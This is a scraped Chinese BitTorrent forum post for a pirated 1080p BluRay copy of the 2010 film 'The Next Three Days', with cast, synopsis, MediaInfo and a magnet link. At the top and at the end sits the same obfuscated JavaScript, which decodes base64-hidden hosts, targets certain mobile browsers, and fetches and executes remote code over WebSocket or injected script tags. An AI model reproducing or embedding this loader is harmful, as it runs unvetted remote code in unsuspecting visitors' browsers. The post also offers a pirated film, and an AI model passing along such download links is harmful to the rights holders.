危情三日[中文字幕].The.Next.Three.Days.2010.1080p.BluRay.x265.10bit.DTS 6.77GB

版主小s 1月前 417

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 危情三日 / 惊劫72小时(港) / 关键救援72小时(台) / 三日危情 / 未来三天 / 余下三天

◎片 名 The Next Three Days

◎年 代 2010

◎产 地 美国 / 法国

◎类 别 剧情 / 动作 / 爱情 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2011-04-29(中国大陆) / 2010-11-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt1458175/

◎豆瓣评分 8.0/10 (79037人评价)

◎豆瓣链接 https://movie.douban.com/subject/3808604/

◎片 长 133分钟

◎导 演 保罗·哈吉斯 Paul Haggis (id:1032048)

◎编 剧 保罗·哈吉斯 Paul Haggis (id:1032048)

弗雷德·卡瓦耶 Fred Cavayé (id:1275995)

◎演 员 罗素·克劳 Russell Crowe (id:1016674)

伊丽莎白·班克斯 Elizabeth Banks (id:1004571)

泰·辛普金斯 Ty Simpkins (id:1322702)

奥利维亚·王尔德 Olivia Wilde (id:1031795)

连姆·尼森 Liam Neeson (id:1031220)

乔纳森·塔克 Jonathan Tucker (id:1017994)

布莱恩·丹内利 Brian Dennehy (id:1013729)

瑞秋·迪肯 Rachel Deacon (id:1321757)

连尼·詹姆斯 Lennie James (id:1027381)

杰森·贝盖 Jason Beghe (id:1032255)

詹姆斯·兰索恩 James Ransone (id:1147933)

莫兰·阿提艾斯 Moran Atias (id:1000310)

艾莎·辛德斯 Aisha Hinds (id:1176767)

丹尼尔·斯特恩 Daniel Stern (id:1049654)

罗伯特·菲茨杰拉德·迪格斯 RZA (id:1009393)

迈克尔·诺季克 Michael Nozik (id:1293319)

Olivier Delbosc Olivier Delbosc (id:1282182)

安东尼·卡塔格斯 Anthony Katagas (id:1288176)

丹尼·艾夫曼 Danny Elfman (id:1019059)

阿尔维托·伊格莱西亚斯 Alberto Iglesias (id:1287288)

斯特凡纳·方丹 Stéphane Fontaine (id:1283954)

兰迪·希勒 Randi Hiller (id:1286647)

劳伦斯·本奈特 Laurence Bennett (id:1278355)

梅兰妮·休斯 Melanie Hughes (id:1287115)

Francisco X. Pérez Francisco X. Pérez (id:1280155)

内森·麦克基尼斯 Nathan McGuinness (id:1291611)

◎标 签 美国 / 剧情 / 犯罪 / 悬疑 / RussellCrowe / 爱情 / 美国电影 / 动作

◎简 介

匹兹堡的文学教师约翰(罗素·克劳 Russell Crowe 饰)本来有个幸福的三口之家,但这天警察突然登门,将他的妻子劳拉(伊丽莎白·班克斯 Elizabeth Banks 饰)以谋杀罪逮捕。几乎所有证据都指向劳拉是杀害自己女老板的嫌凶,连律师也认为翻盘无望,劳拉压力过大甚至尝试自杀。约翰执着的相信妻子的清白,他不需要妻子的解释,他信任妻子,这就足够了。想要救出妻子的约翰开始筹划越狱,他请教曾经多次越狱的越狱专家,仔细观察匹兹堡监狱的所有角落,一个越狱计划开始逐渐成型。然而监狱方面突然准备提前转移劳拉,约翰的时间,只剩下了三天。眼看出卖房屋筹集资金无法实现,约翰决定铤而走险抢劫毒贩,这个平时温和的男人,要为拯救妻子变身为强悍的战士!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 264197360740490944842799203593866815838 (0xC6C28F9269748669DF9DA379728DA95E)

  4. Complete name : [email protected]Q.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.77 GiB

  8. Duration : 2 h 13 min

  9. Overall bit rate : 7 281 kb/s

  10. Movie name : The Next Three Days - Blu-ray?

  11. Encoded date : UTC 2021-10-29 04:31:03

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 13 min

  23. Bit rate : 5 723 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.152

  33. Stream size : 5.32 GiB (79%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 13 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.40 GiB (21%)

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4611 (0x1203)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 2 h 3 min

  66. Bit rate : 29.3 kb/s

  67. Count of elements : 2084

  68. Stream size : 26.0 MiB (0%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4612 (0x1204)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 2 h 3 min

  82. Bit rate : 29.5 kb/s

  83. Count of elements : 2084

  84. Stream size : 26.2 MiB (0%)

  85. Title : cht&eng

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4613 (0x1205)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 2 h 3 min

  98. Bit rate : 15.9 kb/s

  99. Count of elements : 2084

  100. Stream size : 14.1 MiB (0%)

  101. Title : chs

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4614 (0x1206)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 2 h 3 min

  114. Bit rate : 16.1 kb/s

  115. Count of elements : 2084

  116. Stream size : 14.3 MiB (0%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Text #5

  123. ID : 7

  124. ID in the original source medium : 4609 (0x1201)

  125. Format : PGS

  126. Muxing mode : zlib

  127. Codec ID : S_HDMV/PGS

  128. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  129. Duration : 2 h 8 min

  130. Bit rate : 23.9 kb/s

  131. Count of elements : 2270

  132. Stream size : 21.9 MiB (0%)

  133. Title : eng

  134. Language : English

  135. Default : No

  136. Forced : No

  137. Original source medium : Blu-ray


  138. Menu

  139. 00:00:00.000 : en:Chapter 01

  140. 00:13:34.438 : en:Chapter 02

  141. 00:24:08.572 : en:Chapter 03

  142. 00:34:31.360 : en:Chapter 04

  143. 00:39:52.348 : en:Chapter 05

  144. 00:44:26.580 : en:Chapter 06

  145. 00:53:59.861 : en:Chapter 07

  146. 00:57:53.803 : en:Chapter 08

  147. 01:03:46.948 : en:Chapter 09

  148. 01:07:22.371 : en:Chapter 10

  149. 01:19:12.164 : en:Chapter 11

  150. 01:28:39.522 : en:Chapter 12

  151. 01:34:29.747 : en:Chapter 13

  152. 01:45:59.895 : en:Chapter 14

  153. 01:51:51.663 : en:Chapter 15

  154. 01:58:58.256 : en:Chapter 16


TAGS 动作 剧情 惊悚 犯罪 爱情

磁力链:
  • magnet:?xt=urn:btih:0A7B3278EFB677C3E2C97A4B3EE179A3855A488C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};